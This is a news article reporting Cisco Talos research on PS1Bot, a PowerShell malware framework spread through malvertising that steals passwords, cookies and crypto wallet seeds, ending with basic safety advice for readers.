Cisco Talos researchers have discovered a dangerous new malware framework called PS1Bot. Active since early 2025, this sophisticated threat spreads through malvertising and is designed to steal cryptocurrency wallets, passwords, and other sensitive information.
Hackread.com has learned about a new, highly active cyberattack from research carried out by cybersecurity experts at Cisco Talos. Their technical blog post, shared exclusively with us, details a new type of malicious software called PS1Bot.
What is PS1Bot?
PS1Bot is a powerful and sneaky malware framework that has been very active since early 2025. It gets its name, in part, from being created with PowerShell, a programming language often used on Windows computers.
What makes PS1Bot so dangerous is its ability to perform multiple harmful actions. It can steal sensitive information, record what you type (a process known as keylogging), and take screenshots of your computer. It can even take over your system and stay there even after you restart your computer.
The research also highlights the malware’s particularly effective information-stealing capabilities, noting that it specifically targets passwords, browser cookies, and even cryptocurrency wallet seed phrases.
The malware is designed to be hard to detect. It uses a clever trick called in-memory execution, which means it runs its harmful programs directly in your computer’s memory instead of saving them as files on your hard drive. This makes it much harder for antivirus software to spot. Researchers also found that the malware checks to see if antivirus programs are installed on a system before proceeding with its full attack.
How Does it Spread?
According to Cisco Talos research, the malware is primarily spread through malicious online advertising, also known as malvertising. People searching online for common things like “medicare benefit policy manual” or “Counting Canadian Money Worksheets Pdf” might be led to a website that secretly downloads a compressed file to their computer. Inside these files is a seemingly harmless file named FULL DOCUMENT.js that, when opened, downloads and runs the PS1Bot malware.
“The victim is initially delivered a compressed archive. The file names Talos observed in the wild are consistent with what is typically seen during search engine optimization (SEO) poisoning and/or malvertising campaigns, where the file name matches the keyword phrase being targeted in the campaigns.”
Cisco Talos
A Growing Threat
Cisco Talos has been tracking this campaign all year and has seen a steady flow of new versions of the malware, which suggests that the creators are constantly improving it. The researchers noted similarities between PS1Bot and other malware families, like AHK Bot and Skitnet, which suggests the same cybercriminals might be behind these different threats.
The research shows that this malware is a rapidly evolving and serious risk to anyone using the internet. To protect yourself, always be careful about what you download. Even if a file name looks familiar, like a manual or a document, be suspicious if it comes from a strange or unexpected website. Also, avoid clicking on suspicious pop-up ads and stick to reputable websites.
